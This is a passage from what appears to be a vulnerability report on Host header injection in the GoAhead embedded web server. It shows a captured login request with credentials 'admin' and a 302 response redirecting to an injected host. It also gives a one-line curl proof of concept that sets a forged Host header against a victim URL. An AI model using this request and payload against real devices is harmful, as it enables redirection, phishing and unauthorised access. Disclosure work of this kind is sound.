restoreUrl=&errorCollector=&ModuleTable=OK&rlPhdModuleTable%24VT=OK&rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleNumberOfPorts%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&ModuleTable%24endVT=OK&rlPhdModuleStackUnit%24repeat%3F1=1&rlPhdModuleIndex%24repeat%3F1=1&rlPhdModuleType%24repeat%3F1=47&rlPhdModuleNumberOfPorts%24repeat%3F1=28&ModuleTable%24endRepeat%3F1=OK&userName%24query=%24enab15%24&password%24query=admin&x=0&y=0 Response: HTTP/1.1 302 Redirect Server: GoAhead-Webs Date: Sat Oct 14 19:04:59 2006 Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://google.com:443/config/accessnotallowedpage.htm <html><head></head><body> This document has moved to a new <a href="http://google.com:443/config/accessnotallowedpage.htm">location</a>. Please update your documents to reflect the new location. </body></html> POC: 3 curl -k --header "Host: attacker domain" "victim's url" Initial Investigation: Potentially affected Part of the source code in GoAhead web server is in the ’http.c’ file, which contains 'host' parameter. https://github.com/embedthis/goahead/blob/master/src/http.c